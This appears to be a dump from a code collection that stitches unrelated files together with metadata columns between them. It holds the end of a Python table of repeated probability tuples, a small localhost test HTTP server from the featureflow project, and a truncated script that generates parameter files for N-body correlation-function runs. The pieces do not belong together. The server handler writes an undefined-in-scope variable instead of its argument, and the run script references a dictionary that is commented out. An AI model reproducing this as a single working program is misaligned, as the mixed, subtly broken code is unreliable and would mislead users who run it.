(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 131
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 132
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 133
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 134
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 135
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 136
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 137
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 138
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 139
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 140
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 141
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 142
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 143
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 144
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 145
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 146
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 147
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 148
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 149
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 150
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 151
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 152
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 153
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 154
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 155
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 156
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 157
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 158
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 159
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 160
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 161
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 162
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 163
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 164
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 165
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 166
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 167
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 168
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 169
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 170
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 171
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 172
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 173
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 174
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 175
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 176
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 177
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 178
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 179
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 8991598675325360468762009371570610170
#index for seed sequence child
child_seed_index = (
1, # 0
16, # 1
)
| 276.481283 | 500 | 0.769742 |
0e3a66238933f9c5b54dd7fdb1c41b196943196e | 634 | py | Python | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 7 | 2017-06-10T13:26:04.000Z | 2021-04-01T07:46:53.000Z | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 9 | 2016-08-05T01:51:36.000Z | 2020-06-01T13:32:34.000Z | featureflow/dummyserver.py | jayvdb/featureflow | 7731487b00e38fa4f58c88b7881870fda2d69fdb | [
"MIT"
] | 5 | 2016-09-09T03:19:35.000Z | 2021-11-28T01:28:56.000Z | import http.server
import sys
def handler_class(static_content):
class DummyHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Length', len(static_content))
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(content.encode())
return DummyHandler
if __name__ == '__main__':
port = int(sys.argv[1])
content = sys.argv[2]
server = http.server.HTTPServer(
('localhost', port),
handler_class(content))
server.serve_forever()
| 27.565217 | 67 | 0.635647 |
57dba6a08bf6ad19d9a6c2a3a5a4cea8ec11f9eb | 10,379 | py | Python | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | 6 | 2021-09-28T04:00:56.000Z | 2022-03-23T03:49:19.000Z | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | null | null | null | struct/measurement/nbody/2pcf/RUN_test.py | naonori/hitomi | 02b188eb8ada4d39a10801bf3193581b9bc9c310 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import subprocess
try:
os.mkdir("LOG")
except:
print("")
try:
os.mkdir("PARAMS")
except:
print("")
realization = 1
measure = "2PCF"
boxsize_x = 1000.0
boxsize_y = 1000.0
boxsize_z = 1000.0
n_mesh_x = 512
n_mesh_y = 512
n_mesh_z = 512
n_kbin = 20
kmin = 0.01
kmax = 0.20
n_rbin = 25
rmin = 30.0
rmax = 150.0
flag_recon = "False" # "True" or "False"
b1_fid = 2.0
RG = 15.0
ith_kbin = 0
ith_rbin = 0
# b1_fid_dict = {}
# b1_fid_dict.update({"zbin0_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin0_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin0_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin1_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin1_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin1_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin2_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin2_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin2_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin3_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin3_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin3_Mmin13.5_Mmax14.0": })
# b1_fid_dict.update({"zbin4_Mmin12.5_Mmax13.0": })
# b1_fid_dict.update({"zbin4_Mmin13.0_Mmax13.5": })
# b1_fid_dict.update({"zbin4_Mmin13.5_Mmax14.0": })
for zbin in [0, 1, 2, 3, 4]:
for flag_RSD in ["False", "True"]:
if flag_RSD == "False":
MULTIPOLE = [(0,0,0)]
else:
MULTIPOLE = [(0,0,0), (2,0,2),(4,0,4)]
for (ell1, ell2, ELL) in MULTIPOLE:
for sim_data in ["Gadget", "Rockstar"]:
if sim_data == "Gadget":
Mmin_Mmax = [(12.9, 13.1)]
else:
Mmin_Mmax = [(12.5, 13.0), (13.0, 13.5), (13.5, 14.0)]
for (log10_Mmin, log10_Mmax) in Mmin_Mmax:
if flag_recon == "True":
b1_fid = b1_fid_dict["zbin%d_Mmin%2.1f_Mmax%2.1f" % (zbin, log10_Mmin, log10_Mmax)]
data_dir = "/mwork0/sugiymnn/WORK/data/nbody/%04d" % realization
if sim_data == "Gadget":
data_file = "snapdir_%03d/snapshot_%03d" % (zbin, zbin)
random_file = "AAA"
elif sim_data == "Rockstar":
data_file = "rockstar/out_%d.list" % (zbin)
if flag_recon == "False":
random_file = "AAA"
elif flag_recon == "True":
random_file = "rockstar/random/random_Mmin%s_Mmax%s_zbin%d.dat" % (log10_Mmin, log10_Mmax, zbin)
else:
print("ERROR")
exit()
if sim_data == "Gadget":
if flag_recon == "False":
output_dir = "results_test_%s_zbin%d_RSD%s" % (sim_data, zbin, flag_RSD)
elif flag_recon == "True":
output_dir = "results_test_%s_zbin%d_RSD%s_recon_R%02d" % (sim_data, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
elif sim_data == "Rockstar":
if flag_recon == "False":
output_dir = "results_test_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s" % (sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD)
elif flag_recon == "True":
output_dir = "results_test_%s_Mmin%2.1f_Mmax%2.1f_zbin%d_RSD%s_recon_R%02d" % (sim_data, log10_Mmin, log10_Mmax, zbin, flag_RSD, RG)
else:
print("ERROR")
exit()
else:
print("ERROR")
exit()
fr = open("default_param.ini", "r")
AA = fr.readlines()
fr.close()
AA = [AA[i].replace("data_dir = /mwork0/sugiymnn/WORK/data/boss/galaxy_DR12v5_CMASSLOWZTOT",\
"data_dir = %s" % data_dir) for i in range(len(AA))]
AA = [AA[i].replace("data_file = galaxy_DR12v5_CMASSLOWZTOT_North_ZBIN1.dat",\
"data_file = %s" % data_file) for i in range(len(AA))]
AA = [AA[i].replace("random_file = random_DR12v5_CMASSLOWZTOT_North_ZBIN1.dat",\
"random_file = %s" % random_file) for i in range(len(AA))]
AA = [AA[i].replace("output_dir = results",\
"output_dir = %s" % output_dir) for i in range(len(AA))]
AA = [AA[i].replace("measure = pk", "measure = %s" % measure) for i in range(len(AA))]
AA = [AA[i].replace("realization = 0", "realization = %d" % realization) for i in range(len(AA))]
AA = [AA[i].replace("ell1 = 0", "ell1 = %d" % ell1) for i in range(len(AA))]
AA = [AA[i].replace("ell2 = 0", "ell2 = %d" % ell2) for i in range(len(AA))]
AA = [AA[i].replace("ELL = 0", "ELL = %d" % ELL) for i in range(len(AA))]
AA = [AA[i].replace("boxsize_x = 1000.0", "boxsize_x = %3.1f" % boxsize_x) for i in range(len(AA))]
